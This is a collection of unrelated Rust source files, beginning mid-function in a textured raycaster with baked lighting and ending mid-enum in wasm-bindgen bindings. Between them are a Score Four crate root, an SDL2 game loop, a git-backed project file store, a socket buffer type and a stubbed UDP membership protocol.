                some_distance_away.0.floor() as i32,
                some_distance_away.1.floor() as i32,
            ),
        )?;
        */
        // Kay, draw the walls now if we hit something
        // Keep whichever crossing (horizontal or vertical grid line) is nearer.
        let ((intersection, closest_hit), side) = if horizontal_distance.1 < vertical_distance.1 {
            (horizontal_distance, 'h')
        } else {
            (vertical_distance, 'v')
        };
        if closest_hit != f32::MAX {
            // cos(ray - view) removes the fisheye distortion from the distance.
            let distance_to_wall =
                closest_hit * (ray_rotation.radians() - rotation.radians()).cos();
            let projected_height =
                (tile_size / distance_to_wall * distance_to_plane).floor() as i32;
            let mid_point = projection_plane.1 / 2;
            let wall_bottom = mid_point + projected_height / 2;
            let wall_top = mid_point - projected_height / 2;
            // Draw fill color of walls
            /*
            let color =
                (if side == 'v' { 750.0 } else { 450.0 } * (1.0 / distance_to_wall.sqrt())) as u8;
            canvas.set_draw_color((color, color, color));
            canvas.draw_line((x, wall_top), (x, wall_bottom - 2))?;
            */
            // Draw wall texture
            // Texture column comes from where along the tile the ray landed.
            let wall_x = if side == 'h' {
                intersection.x
            } else {
                intersection.y
            };
            let tex_x = ((wall_x / tile_size).fract() * wall_texture.width() as f32) as i32;
            let dst_to_light = map.distance_to_light(intersection.x, intersection.y, Some(&mut rng), side);
            let light_mult = light_intensity(dst_to_light);
            let mult = 1. / distance_to_wall + light_mult;
            // So dark we don't need to copy anything
            if mult > 0.00 {
                wall_texture.draw_strip_at_ex(
                    x,
                    tex_x,
                    wall_top,
                    wall_bottom,
                    pixels,
                    Some(&[mult, mult, mult]),
                );
            }
            // Angle between this ray and the view direction, reused by the
            // floor/ceiling caster for its own fisheye correction.
            let angle = rotation.rotated(-ray_rotation.degrees());
            // Floor: screen rows below the wall slice.
            floorcast(
                x,
                wall_bottom..projection_plane.1,
                &position,
                &ray_rotation,
                angle.clone(),
                distance_to_plane,
                projection_plane,
                pixels,
                floor_texture,
                'f',
                &map,
                &mut rng,
            )?;
            // Ceiling: screen rows above the wall slice.
            floorcast(
                x,
                0..wall_top,
                &position,
                &ray_rotation,
                angle,
                distance_to_plane,
                projection_plane,
                pixels,
                floor_texture,
                'c',
                &map,
                &mut rng,
            )?;
        }
        // Done, next angle
        ray_rotation.add(degrees_per_iteration);
    }
    Ok(())
}
// Looks for horizontal grid lines
// ============= <-
// | | | | |
// ============= <- these
// | | | | |
// ============= <-
/// Finds the first horizontal grid line along `ray_rotation` at which the
/// ray hits a blocking tile, returning the intersection point and its
/// distance from `position` (distance is `f32::MAX` if `step_ray` gives up).
fn look_for_horizontal(
    ray_rotation: &Rotation,
    position: &Position,
    map: &Map,
) -> Result<(IntersectionPoint, f32), String> {
    let tile_size = TILE_SIZE as f32;
    // Define the first intersection
    let mut intersection = {
        // The Y of the first intersection is going to be player_position_y / tile_size. And we add one tile_size to that if looking down
        let mut first_y = (position.y / tile_size).floor() * tile_size;
        let mut mod_y = 0;
        if !ray_rotation.is_facing_up() {
            first_y += tile_size;
        } else {
            // Facing up: the boundary belongs to the tile above it.
            mod_y -= 1;
        }
        // Project along the ray to get the matching X (tan relates dy to dx).
        let first_x = position.x + (position.y - first_y) / -ray_rotation.tan();
        IntersectionPoint::new(first_x, first_y, 0, mod_y, TILE_SIZE)
    };
    Ok(step_ray(
        position,
        &mut intersection,
        &ray_rotation,
        'h',
        map,
        0,
    ))
}
// Looks for vertical grid lines
// ‖--‖--‖--‖--‖
// ‖ ‖ ‖ ‖ ‖
// ‖--‖--‖--‖--‖
// ‖ ‖ ‖ ‖ ‖
// ‖--‖--‖--‖--‖
// ^ ^ ^ ^ ^
// |
// these
/// Finds the first vertical grid line along `ray_rotation` at which the ray
/// hits a blocking tile; mirror image of `look_for_horizontal`.
fn look_for_vertical(
    ray_rotation: &Rotation,
    position: &Position,
    map: &Map,
) -> Result<(IntersectionPoint, f32), String> {
    let tile_size = TILE_SIZE as f32;
    // Define the first intersection
    let mut intersection = {
        // We know the first_x that will be hit because it's
        // the next (or previous) grid line from player position
        let mut first_x = (position.x / tile_size).floor() * tile_size;
        let mut mod_x = 0;
        if !ray_rotation.is_facing_left() {
            // And if the ray is going right, then it's the next grid line
            first_x += tile_size;
        } else {
            // Otherwise it's in the same position but it needs to check the grid to the left
            mod_x -= 1;
        }
        // tan(θ) = opposite/adjacent
        let first_y = position.y + (position.x - first_x) * -ray_rotation.tan();
        IntersectionPoint::new(first_x, first_y, mod_x, 0, TILE_SIZE)
    };
    Ok(step_ray(
        position,
        &mut intersection,
        &ray_rotation,
        'v',
        map,
        0,
    ))
}
/// Recursively walks the ray from one grid line of kind `side` ('h' or 'v')
/// to the next until it reaches a blocking tile, returning the hit point and
/// its euclidean distance from `position`. Gives up with `f32::MAX` after
/// 250 steps to bound the recursion.
fn step_ray(
    position: &Position, // From
    intersection: &mut IntersectionPoint, // To
    ray_rotation: &Rotation,
    side: char,
    map: &Map,
    n: i32, // recursion depth, capped below
) -> (IntersectionPoint, f32) {
    let tile_size = TILE_SIZE as f32;
    // Hit: this crossing's grid cell is a wall.
    if map.is_blocking_at(intersection.as_grid_pair()) {
        return (
            *intersection,
            (position.y - intersection.y).hypot(position.x - intersection.x),
        );
    }
    // Step to the next grid line of the same kind: one tile along the
    // primary axis, tan(angle) times that along the other axis.
    let (distance_to_next_x, distance_to_next_y) = if side == 'v' {
        let distance_to_next_x = if ray_rotation.is_facing_left() {
            -tile_size
        } else {
            tile_size
        };
        (distance_to_next_x, distance_to_next_x * ray_rotation.tan())
    } else {
        let distance_to_next_y = if ray_rotation.is_facing_up() {
            -tile_size
        } else {
            tile_size
        };
        (distance_to_next_y / ray_rotation.tan(), distance_to_next_y)
    };
    // Depth cap: treat an overly long ray as "no hit".
    if n > 250 {
        return (*intersection, f32::MAX);
    }
    let nextx = intersection.x + distance_to_next_x;
    let nexty = intersection.y + distance_to_next_y;
    // NOTE(review): mod_x/mod_y are carried through unchanged from the first
    // crossing — confirm that is intended for every subsequent step.
    step_ray(
        position,
        &mut IntersectionPoint::new(
            nextx,
            nexty,
            intersection.mod_x,
            intersection.mod_y,
            TILE_SIZE,
        ),
        ray_rotation,
        side,
        map,
        n + 1,
    )
}
/// A ray/grid-line crossing in world coordinates. `mod_x`/`mod_y` shift the
/// owning grid cell by one when the crossing sits on a shared boundary.
#[derive(Debug, Clone, Copy, PartialEq)]
struct IntersectionPoint {
    pub x: f32,
    pub y: f32,
    pub mod_x: i32, // Which grid does this point belong to.
    pub mod_y: i32,
    grid_size: f32,
}

impl IntersectionPoint {
    pub fn new(x: f32, y: f32, mod_x: i32, mod_y: i32, grid_size: i32) -> IntersectionPoint {
        let grid_size = grid_size as f32;
        IntersectionPoint { x, y, mod_x, mod_y, grid_size }
    }

    /// The (column, row) grid cell this crossing belongs to.
    pub fn as_grid_pair(&self) -> (i32, i32) {
        let column = (self.x / self.grid_size).floor() as i32 + self.mod_x;
        let row = (self.y / self.grid_size).floor() as i32 + self.mod_y;
        (column, row)
    }
}
impl Default for IntersectionPoint {
fn default() -> IntersectionPoint {
IntersectionPoint {
x: 0.0,
y: 0.0,
mod_x: 0,
mod_y: 0,
grid_size: 0.0,
}
}
}
/// The world: a flat char grid plus pre-baked per-pixel lighting data.
pub struct Map {
    tiles: Vec<char>,        // row-major grid: '#' wall, '.' floor, 'l' light
    width: i32,              // grid width in tiles
    height: i32,             // grid height in tiles
    lights: Vec<(i32, i32)>, // light positions in world units
    // Closest visible light per world pixel (None = fully shadowed).
    light_data: Vec<Option<(i32, i32)>>,
}
impl Map {
    /// Builds the hard-coded demo map ('#' = wall, '.' = floor, 'l' = light)
    /// and pre-computes the nearest-light table for every world pixel.
    pub fn new() -> Map {
        let mut map = Map {
            tiles: r#"
            ##################
            #.............####
            #..............###
            #.............####
            #.............####
            #.............####
            #..............###
            #..............###
            #......#.......###
            #.....#..#.....###
            #........#.....###
            #...##.#####...###
            #...#..........###
            #......l..#....###
            #...##....#....###
            #...####..#....###
            #.........#....###
            ##################
            "#
            .to_owned()
            .replace('\n', "")
            .replace(' ', "")
            .chars()
            .collect(),
            width: 18,
            height: 18,
            lights: Vec::new(),
            light_data: Vec::new(),
        };
        map.bake_lights();
        map
    }
    // Finds the closest light source for every tile on map
    fn bake_lights(&mut self) {
        self.lights.clear();
        // Collect light positions in world units (tile index * TILE_SIZE).
        for (i, t) in self.tiles.iter().enumerate() {
            if *t == 'l' {
                let x = (i as i32 % self.width) * TILE_SIZE;
                let y = (i as i32 / self.width) * TILE_SIZE;
                self.lights
                    .push((x, y));
            }
        }
        // One entry per world pixel: the closest light with line of sight.
        let total_width = self.width * TILE_SIZE;
        let mut light_data = vec![None; (self.width * self.height * TILE_SIZE * TILE_SIZE) as usize];
        for x in 0..total_width {
            for y in 0..self.height * TILE_SIZE {
                let light_pos = self.prepare_light_data(x, y);
                light_data[(total_width * y + x) as usize] = light_pos;
            }
        }
        self.light_data = light_data;
    }
    /// True if the tile at grid coordinates (x, y) is a wall.
    /// NOTE(review): the bounds use `>` rather than `>=`, and an in-range
    /// index computed from out-of-range x can alias into the next row via
    /// `width * y + x` — confirm this is intended.
    fn is_blocking_at(&self, (x, y): (i32, i32)) -> bool {
        let given_idx = (self.width * y + x) as usize;
        if y > self.height || x > self.width || given_idx >= self.tiles.len() {
            return false;
        }
        self.tiles[given_idx] == '#'
    }
    /// Returns the position of the closest light with line of sight to
    /// world pixel (x, y), or None when every light is occluded.
    fn prepare_light_data(&self, x: i32, y: i32) -> Option<(i32, i32)> {
        let mut closest = None;
        for (lx, ly) in &self.lights {
            // Occlusion test: a blocked ray gets distance MAX so it never wins.
            let dst = if let Some(_) =
                crate::util::raycast((x as i32, y as i32), (*lx as i32, *ly as i32), |point| {
                    let x_diff = (point.0 - x).abs();
                    let y_diff = (point.1 - y).abs();
                    // Ignore blockers within 2px of the start so a wall pixel
                    // does not occlude itself.
                    if x_diff < 2 && y_diff < 2 { return false; }
                    self.is_blocking_at((point.0 / TILE_SIZE, point.1 / TILE_SIZE))
                }) {
                f32::MAX
            } else {
                let x = ((x - lx) as f32).abs();
                let y = ((y - ly) as f32).abs();
                x.hypot(y)
            };
            // Keep the minimum-distance light seen so far.
            if let Some((c, _)) = closest {
                if dst < c {
                    closest = Some((dst, (*lx, *ly)));
                }
            } else {
                closest = Some((dst, (*lx, *ly)));
            }
        }
        if let Some(closest) = closest {
            if closest.0 == f32::MAX {
                return None;
            }
            Some(closest.1)
        } else {
            None
        }
    }
    /// Distance from world point (x, y) to its pre-baked closest light, with
    /// optional random dithering to soften banding. `side` is 'h'/'v' for
    /// walls and 'f'/'c' for floor/ceiling.
    pub fn distance_to_light(&self, x: f32, y: f32, rng: Option<&mut rand::rngs::SmallRng>, side: char) -> Option<f32> {
        let gx = x.round() as i32;
        let gy = y.round() as i32;
        let idx = (self.width * TILE_SIZE * gy + gx) as usize;
        if idx >= self.light_data.len() {
            return None;
        }
        let tile_size = TILE_SIZE as f32;
        if let Some((lx, ly)) = self.light_data[idx] {
            // Dither amplitude: large for floor/ceiling, subtle for walls.
            let dither = if let Some(rng) = rng {
                if side == 'c' || side == 'f' {
                    rng.gen_range(1.,18.)
                } else {
                    rng.gen_range(1.,2.)
                }
            } else {
                0.0
            };
            // NOTE(review): this mixes the point's x with the light's y
            // (`gx - ly`) and vice versa — looks like a swapped pair
            // (expected gx - lx / gy - ly); confirm before relying on it.
            let sign = if side == 'h' {
                (gx - ly).signum()
            } else {
                (gy - lx).signum()
            } as f32;
            let (lx, ly) = (
                lx as f32 + if side == 'h' { dither * sign } else { 0. },
                ly as f32 + if side == 'v' { dither * sign } else { 0. },
            );
            let dst = (lx - x).abs().hypot((ly - y).abs());
            return Some(dst + if side == 'c' || side == 'f' { dither } else { 0.0 });
        }
        None
    }
}
// Eye height used by the floor/ceiling projection: half a tile.
const PLAYER_HEIGHT: i32 = TILE_SIZE / 2;
/// Draws the floor (`side == 'f'`) or ceiling (`side == 'c'`) pixels of one
/// screen column `x` for the vertical pixel `range`, projecting each screen
/// row back into the world to sample `floor_texture` and the baked lighting.
fn floorcast(
    x: i32,
    range: std::ops::Range<i32>,
    player: &Position,
    ray: &Rotation,
    angle: Rotation,
    distance_to_plane: f32,
    projection_plane: (i32, i32),
    pixels: &mut [u8],
    floor_texture: &Texture,
    side: char,
    map: &Map,
    rng: &mut rand::rngs::SmallRng,
) -> Result<(), String> {
    let projection_center = projection_plane.1 / 2;
    let tile_size = TILE_SIZE as f32;
    for row in range {
        // Pixel distance from the screen center; mirrored for the ceiling.
        let bheight = if side == 'f' {
            row - projection_center
        } else {
            projection_center - row
        };
        // Similar triangles: project the eye height through this screen row
        // back into the world to get the straight-ahead distance.
        let straight_distance =
            (PLAYER_HEIGHT as f32 / (bheight) as f32) * distance_to_plane as f32;
        // Undo the fisheye correction to get distance along this ray.
        let distance_to_point = straight_distance / angle.cos();
        // World-space point this screen pixel maps to.
        let ends = (
            distance_to_point * ray.cos() + player.x,
            distance_to_point * ray.sin() + player.y,
        );
        let tex_x = ((ends.0 / tile_size).fract() * floor_texture.width() as f32) as i32;
        let tex_y = ((ends.1 / tile_size).fract() * floor_texture.height() as f32) as i32;
        let distance_to_light = map.distance_to_light(ends.0, ends.1, Some(rng), side);
        let light_mult = light_intensity(distance_to_light);
        // Shade by distance plus the light contribution. (Two empty `if`
        // statements holding only commented-out clamping experiments were
        // removed here; they had no effect on behavior.)
        let mult = 1. / distance_to_point + light_mult;
        floor_texture.copy_to_ex(tex_x, tex_y, x, row, pixels, Some(&[mult, mult, mult]));
    }
    Ok(())
}
/// Converts a distance-to-light into a brightness multiplier, capped at
/// 1.15; `None` (no visible light) contributes 0.
fn light_intensity(dtl: Option<f32>) -> f32 {
    let raw = match dtl {
        None => 0.0,
        Some(distance) => {
            // Quantize the distance so the shading forms visible bands.
            let banded = util::round_n(distance, (TILE_SIZE / 2) as f32);
            // Falloff exponent: gentle near the light, steep far away.
            let falloff = if distance < 60. {
                0.95
            } else if distance > 100. {
                2.
            } else {
                1.15
            };
            (1.0 / banded.powf(falloff)).sqrt()
        }
    };
    raw.min(1.15)
}
|
//! # Score Four Library for Rust
//! This is a simple Score Four board library for Rust.
//!
//! ## Example
//! ```
//! extern crate score_four;
//! use score_four::{Board, BoardStatus};
//!
//! let mut board = Board::new();
//! board.put(0); // put a bead in (0, 0) position
//! assert_eq!(board.status(), BoardStatus::Ongoing);
//! ```
//!
extern crate rand;
mod bitboard;
pub use crate::bitboard::{BitBoard, EMPTY};
mod color;
pub use crate::color::{Color, NUM_COLORS};
mod board;
pub use crate::board::{Board, BoardStatus};
mod action;
pub use crate::action::Action;
mod player;
pub use crate::player::{Player, PlayerMC, PlayerRandom};
mod organizer;
pub use crate::organizer::Organizer;
|
use std::process::Command;
#[tokio::main]
async fn main() -> std::io::Result<()> {
let mut cmd_str = String::from("default");
if cfg!(target_os = "linux") {
cmd_str = "telnet".to_string();
}
let output = Command::new("gnome-terminal").arg("--")
.arg("telnet")
.arg("localhost")
.arg("8080")
.output().expect("cmd exec error!");
let output_str = String::from_utf8_lossy(&output.stdout);
println!("{}",output_str);
Ok(())
} |
use apllodb_sql_parser::apllodb_ast;
use apllodb_shared_components::BinaryOperator;
use super::AstTranslator;
impl AstTranslator {
    /// Maps a parser-level binary operator onto the shared-components enum.
    /// The match is deliberately exhaustive with no catch-all, so adding a
    /// new AST operator produces a compile error here.
    pub(crate) fn binary_operator(
        ast_binary_operator: apllodb_ast::BinaryOperator,
    ) -> BinaryOperator {
        match ast_binary_operator {
            apllodb_ast::BinaryOperator::Equal => BinaryOperator::Equal,
        }
    }
}
|
extern crate sdl2;
use sdl2::pixels::Color;
// #[macro_use] asks the compiler to import the macros defined in the `events`
// module. This is necessary because macros cannot be namespaced -- macro
// expansion happens before the concept of namespace even starts to _exist_ in
// the compilation timeline.
#[macro_use]
mod events;
// list of the keyboard events we're interested in.
// See events.rs for the macro definition.
// Generates the `Events` type used below. NOTE(review): the generated field
// semantics (e.g. `now.key_escape: Option<bool>`) come from the macro in
// events.rs — confirm against that definition.
struct_events! {
    keyboard: {
        // Escape key state, polled each frame via `pump()`.
        key_escape: Escape
    },
    else: {
        // Any SDL quit event (window close, SIGINT, ...).
        quit: Quit { .. }
    }
}
use sdl2::render::Renderer;
/// Bundles the Phi abstractions in a single structure which
/// can be passed easily between functions.
/// Bundles the Phi abstractions in a single structure which
/// can be passed easily between functions.
pub struct Phi<'window> {
    /// Input state, refreshed each frame via `pump()`.
    pub events: Events,
    /// SDL renderer tied to the window's `'window` lifetime.
    pub renderer: Renderer<'window>,
}
/// What a view asks the main loop to do after rendering a frame.
pub enum ViewAction {
    /// Keep running the current view.
    None,
    /// Exit the main loop.
    Quit,
}
/// A renderable game state (menu, gameplay, ...).
pub trait View {
    /// Called once per frame. `elapsed` is the time since the previous frame
    /// (presumably in seconds — confirm at the call site). The returned
    /// action tells the main loop whether to continue.
    fn render(&mut self, context: &mut Phi, elapsed: f64) -> ViewAction;
}
/// Opens the game window and runs the event/render loop until the Escape
/// key is pressed or a quit event arrives.
fn main() {
    println!("Hello, world!");

    let sdl_context = sdl2::init().unwrap();
    let video = sdl_context.video().unwrap();

    // 800x600 centered OpenGL window.
    let window = video
        .window("ArcadeRS Shooter", 800, 600)
        .position_centered()
        .opengl()
        .build()
        .unwrap();

    let mut renderer = window.renderer().accelerated().build().unwrap();
    let mut events = Events::new(sdl_context.event_pump().unwrap());

    'game: loop {
        events.pump();

        let wants_quit = events.now.key_escape == Some(true) || events.now.quit;
        if wants_quit {
            break 'game;
        }

        // Clear to black and present the (still empty) frame.
        renderer.set_draw_color(Color::RGB(0, 0, 0));
        renderer.clear();
        renderer.present();
    }
}
|
use std::env::current_dir;
use std::error::Error;
use std::fmt::{self, Display, Formatter};
use std::fs::{read_to_string, File};
use std::io::Write;
use git2::Repository;
use serde::{Serialize, Deserialize};
use super::Project;
use crate::PROJECT_FILE_NAME;
/// Error raised when the project file is missing from the repository root.
#[derive(Debug)]
struct OpenError;
impl Display for OpenError {
    fn fmt(&self, f: &mut Formatter) -> fmt::Result {
        write!(f, "{} file does not exist. Did you forget to initialize a project in this repository?", PROJECT_FILE_NAME)
    }
}
impl Error for OpenError {}
/// In-memory model of the project file: a TOML-serialized list of projects
/// stored at the repository's work-tree root.
#[derive(Serialize, Deserialize, Clone, Debug)]
pub struct GitProject {
    projects: Vec<Project>,
}
impl GitProject {
    /// Entry point for constructing a `GitProject` via the builder.
    pub fn new() -> GitProjectBuilder {
        GitProjectBuilder::new()
    }

    /// Path of the project file at the discovered repository's work-tree
    /// root; shared by `open` and `save`, which previously duplicated it.
    /// NOTE(review): `workdir()` is `None` for bare repositories, which
    /// panics here — unchanged from the previous behavior.
    fn project_file_path() -> Result<std::path::PathBuf, Box<dyn Error>> {
        let repository = Repository::discover(current_dir()?)?;
        let workdir = repository.workdir().unwrap();
        Ok(workdir.join(PROJECT_FILE_NAME))
    }

    /// Loads the project file from the enclosing git repository.
    /// Fails with `OpenError` when the file does not exist.
    pub fn open() -> Result<GitProject, Box<dyn Error>> {
        let root = Self::project_file_path()?;
        if !root.exists() { return Err(Box::new(OpenError)) }

        let string = read_to_string(root)?;
        let git_project = toml::from_str(&string)?;

        Ok(git_project)
    }

    /// Serializes to pretty TOML and overwrites the project file.
    pub fn save(&self) -> Result<(), Box<dyn Error>> {
        let root = Self::project_file_path()?;
        let project_string = toml::to_string_pretty(self)?;
        let mut file = File::create(root)?;
        write!(file, "{}", project_string)?;
        Ok(())
    }

    pub fn projects(&self) -> &[Project] {
        self.projects.as_slice()
    }

    pub fn projects_mut(&mut self) -> &mut [Project] {
        self.projects.as_mut()
    }

    /// Adds `project`; returns `false` (without adding) if a project with
    /// the same name already exists. (`find(..).is_some()` -> `any`.)
    pub fn add_project(&mut self, project: Project) -> bool {
        if self.projects.iter().any(|original| original.name() == project.name()) {
            return false;
        }
        self.projects.push(project);
        true
    }

    /// Replaces the project named `original_name`, or appends when absent.
    pub fn replace_project(&mut self, original_name: &str, project: Project) {
        if let Some(position) = self.projects.iter().position(|original| original.name() == original_name) {
            self.projects[position] = project;
        } else {
            self.projects.push(project);
        }
    }

    /// Removes by index. Panics if `index` is out of bounds (unchanged).
    pub fn delete_project(&mut self, index: usize) {
        self.projects.remove(index);
    }
}
/// Builder accumulating projects before constructing a `GitProject`.
#[derive(Debug)]
pub struct GitProjectBuilder {
    projects: Vec<Project>,
}
impl GitProjectBuilder {
fn new() -> Self {
Self { projects: vec![] }
}
pub fn project(mut self, project: Project) -> Self {
self.projects.push(project);
self
}
pub fn build(self) -> Result<GitProject, Self> {
Ok(GitProject {
projects: self.projects
})
}
}
|
use std::io::{Read, Write, Result};
use std::ptr;
use std::fmt;
use std::cmp;
use psocket::{self, TcpSocket};
/// Growable byte buffer with independent read (`rpos`) and write (`wpos`)
/// cursors; used as the in/out queue for a socket.
pub struct Buffer {
    val: Vec<u8>, // backing storage
    rpos: usize,  // read cursor (next byte `Read` will return)
    wpos: usize,  // write cursor (next position `Write` will fill)
}

impl Buffer {
    pub fn new() -> Buffer {
        Buffer {
            val: Vec::new(),
            rpos: 0,
            wpos: 0,
        }
    }

    /// Borrows the backing storage.
    pub fn get_data(&self) -> &Vec<u8> {
        &self.val
    }

    pub fn len(&self) -> usize {
        self.val.len()
    }

    /// True when the buffer holds no bytes at all.
    pub fn empty(&self) -> bool {
        self.val.is_empty()
    }

    pub fn set_rpos(&mut self, rpos: usize) {
        self.rpos = rpos;
    }

    pub fn get_rpos(&self) -> usize {
        self.rpos
    }

    pub fn set_wpos(&mut self, wpos: usize) {
        self.wpos = wpos;
    }

    pub fn get_wpos(&self) -> usize {
        self.wpos
    }

    /// Drops the first `pos` bytes, shifting both cursors back accordingly.
    /// Cursors saturate at 0 (`saturating_sub` replaces the previous manual
    /// `x - min(x, pos)`); `pos` is clamped to the current length.
    pub fn drain(&mut self, pos: usize) {
        self.rpos = self.rpos.saturating_sub(pos);
        self.wpos = self.wpos.saturating_sub(pos);
        let pos = pos.min(self.val.len());
        self.val.drain(..pos);
    }

    /// Discards all bytes and resets both cursors.
    pub fn drain_all(&mut self) {
        self.rpos = 0;
        self.wpos = 0;
        self.val.drain(..);
    }

    /// Like `drain`, but returns the removed bytes.
    pub fn drain_collect(&mut self, pos: usize) -> Vec<u8> {
        self.rpos = self.rpos.saturating_sub(pos);
        self.wpos = self.wpos.saturating_sub(pos);
        let pos = pos.min(self.val.len());
        self.val.drain(..pos).collect()
    }

    /// Like `drain_all`, but returns the removed bytes.
    pub fn drain_all_collect(&mut self) -> Vec<u8> {
        self.rpos = 0;
        self.wpos = 0;
        self.val.drain(..).collect()
    }

    /// Clears the storage and resets both cursors.
    pub fn clear(&mut self) {
        self.val.clear();
        self.rpos = 0;
        self.wpos = 0;
    }
}
impl fmt::Debug for Buffer {
    /// Formats as `bytes (<debug of raw vec>)`.
    fn fmt(&self, formatter: &mut fmt::Formatter) -> fmt::Result {
        write!(formatter, "bytes ({:?})", self.val)
    }
}
impl Read for Buffer {
fn read(&mut self, buf: &mut [u8]) -> Result<usize> {
let left = self.val.len() - self.rpos;
if left == 0 || buf.len() == 0 {
return Ok(0);
}
let read = if left > buf.len() { buf.len() } else { left };
unsafe {
ptr::copy(&self.val[self.rpos], &mut buf[0], read);
}
self.rpos += read;
Ok(read)
}
}
impl Write for Buffer {
fn write(&mut self, buf: &[u8]) -> Result<usize> {
if self.val.len() < self.wpos + buf.len() {
self.val.resize(self.wpos + buf.len(), 0);
}
if buf.len() == 0 {
return Ok(buf.len());
}
unsafe {
ptr::copy(&buf[0], &mut self.val[self.wpos], buf.len());
}
self.wpos += buf.len();
Ok(buf.len())
}
fn flush(&mut self) -> Result<()> {
Ok(())
}
}
/// Per-socket state kept by the event manager for every allocated socket:
/// the queues of bytes read and pending write, flags for in-flight
/// read/write requests, the last error, and the socket itself.
#[derive(Debug)]
pub struct EventBuffer {
pub read: Buffer, // bytes received and not yet consumed
pub write: Buffer, // bytes queued for writing
pub socket: TcpSocket,
pub read_cache: Vec<u8>, // scratch buffer sized by `capacity` in `new`
pub is_in_write: bool, // a write request is currently in flight
pub is_in_read: bool, // a read request is currently in flight
pub error: Result<()>, // last I/O error, if any
}
impl EventBuffer {
    /// Creates the per-socket state; `capacity` sizes the read scratch
    /// buffer and is clamped to at least 1024 bytes.
    pub fn new(socket: TcpSocket, capacity: usize) -> EventBuffer {
        let capacity = cmp::max(capacity, 1024);
        EventBuffer {
            read: Buffer::new(),
            write: Buffer::new(),
            // field-init shorthand instead of the redundant `socket: socket`
            socket,
            read_cache: vec![0; capacity],
            is_in_write: false,
            is_in_read: false,
            error: Ok(()),
        }
    }

    /// Raw OS handle of the underlying socket.
    pub fn as_raw_socket(&self) -> psocket::SOCKET {
        self.socket.as_raw_socket()
    }

    /// True when unread bytes are queued in the read buffer.
    pub fn has_read_buffer(&self) -> bool {
        !self.read.empty()
    }
}
|
use bincode;
use crossbeam_channel::Receiver;
use serde::{Deserialize, Serialize};
use std::collections::HashMap;
use std::net::{SocketAddr, ToSocketAddrs, UdpSocket};
/// Membership group: our own node, known peers keyed by name, and pending
/// ack channels keyed by ping sequence number.
/// NOTE(review): the Ping/Ack/PingReq/IndirectAck packets and the
/// Alive/Suspect/Dead states suggest a SWIM-style protocol — confirm.
#[derive(Debug)]
struct Group {
me: Node,
peers: HashMap<String, Node>,
// ack for specific ping's seq_no.
ack_handlers: HashMap<u32, Receiver<Packet>>,
}
impl Group {
    /// Lists the current membership view. TODO: not implemented.
    fn members(&self) -> Vec<Node> {
        unimplemented!()
    }

    /// Builds a group from our own node plus seed peers. TODO: not implemented.
    fn new(me: Node, seed_peers: &[Node]) -> Self {
        unimplemented!()
    }

    /// Probes all known peers. TODO: not implemented.
    fn probe_peers(&self) {
        unimplemented!()
    }

    /// Probes a single node. TODO: not implemented.
    fn probe(&self, node: &Node) {
        unimplemented!()
    }

    /// Receives one UDP datagram on our socket and dispatches on the decoded
    /// packet. Socket and decode errors are now propagated as `Err(String)`
    /// instead of panicking via `unwrap`.
    fn packet_listener(&self) -> Result<(), String> {
        let mut buf: Vec<u8> = vec![0; 1024];
        self.me.sock.recv(&mut buf).map_err(|e| e.to_string())?;
        let pkt = decode_packet(&buf)?;
        match pkt {
            Packet::Ping { from, seq_no } => if self.ack_handlers.contains_key(&seq_no) {},
            Packet::Ack { from, seq_no } => {}
            Packet::PingReq => {}
            Packet::IndirectAck => {}
            _ => {}
        }
        Ok(())
    }

    /// Sends `msg` over `sock` to `to`.
    fn send<T: ToSocketAddrs>(sock: &UdpSocket, msg: Vec<u8>, to: T) -> std::io::Result<usize> {
        sock.send_to(&msg, to)
    }

    fn encode_and_send() {}
}
/// A cluster member: identity, protocol counters, its UDP endpoint and
/// liveness state.
#[derive(Debug)]
struct Node {
name: String,
seq_no: u64,
incar_no: u64,
addr: SocketAddr,
sock: UdpSocket,
state: NodeState,
}
impl Node {
/// Intended to produce the next ping sequence number. TODO: stub.
fn next_seq_no(&self) {
unimplemented!()
}
/// Intended to produce the next incarnation number. TODO: stub.
fn next_incar_no(&self) {
unimplemented!()
}
}
/// Liveness state of a member node.
#[derive(Debug)]
enum NodeState {
Alive,
Dead,
Suspect,
}
/// Wire messages exchanged between group members (bincode-encoded, see
/// `encode_packet` / `decode_packet`).
#[derive(Serialize, Deserialize, Debug, PartialEq)]
enum Packet {
Ping { from: String, seq_no: u32 },
Ack { from: String, seq_no: u32 },
PingReq,
IndirectAck,
Alive,
Joined,
Left,
Failed,
}
/// Serializes a packet with bincode; serialization failures are returned as
/// stringified errors instead of panicking.
fn encode_packet(pkt: &Packet) -> Result<Vec<u8>, String> {
    bincode::serialize(pkt).map_err(|e| e.to_string())
}
/// Deserializes a packet with bincode; malformed input is returned as a
/// stringified error instead of panicking.
fn decode_packet(buf: &[u8]) -> Result<Packet, String> {
    bincode::deserialize(buf).map_err(|e| e.to_string())
}
/// Round-trip: encoding then decoding a `Ping` yields the original packet.
#[test]
fn test_encode_decode() {
let before = Packet::Ping {
from: "me".to_owned(),
seq_no: 1234,
};
let buf = encode_packet(&before).unwrap();
let after = decode_packet(&buf).unwrap();
assert_eq!(before, after);
}
|
//! Wraps the exposed APIs under a single place.
//!
//! This crate exposes the following APIs:
//!
//! * Builder
//! * JSON
//! * WASM
pub mod builder;
pub mod json;
pub mod wasm;
|
extern crate js_sys;
extern crate serde;
#[macro_use]
extern crate serde_derive;
extern crate serde_json;
extern crate wasm_bindgen;
extern crate wee_alloc;
use std::fmt::Debug;
use serde_json::{from_slice, to_string};
use wasm_bindgen::prelude::*;
// Use wee_alloc as the global allocator to keep the wasm binary small.
#[global_allocator]
static ALLOC: wee_alloc::WeeAlloc = wee_alloc::WeeAlloc::INIT;
/// `__typename` discriminator for feature payloads (presumably a GraphQL
/// response — confirm against the API).
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum FeatureTypename {
#[serde(rename = "FeatureNode")]
FeatureNode,
}
/// Feature-guide identifiers as spelled by the API.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum FeatureGuideType {
#[serde(rename = "OTHER")]
Other,
#[serde(rename = "QUESTION_DETAIL_TOUR")]
QuestionDetailTour,
}
/// `__typename` discriminator for notification-status payloads.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum NotificationStatusTypename {
#[serde(rename = "NotificationStatus")]
NotificationStatus,
}
/// `__typename` discriminator for user-status payloads.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum UserStatusTypename {
#[serde(rename = "MeNode")]
MeNode,
}
/// Fine-grained permission flags as delivered by the API; variant names are
/// the snake_case wire strings.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub enum Permission {
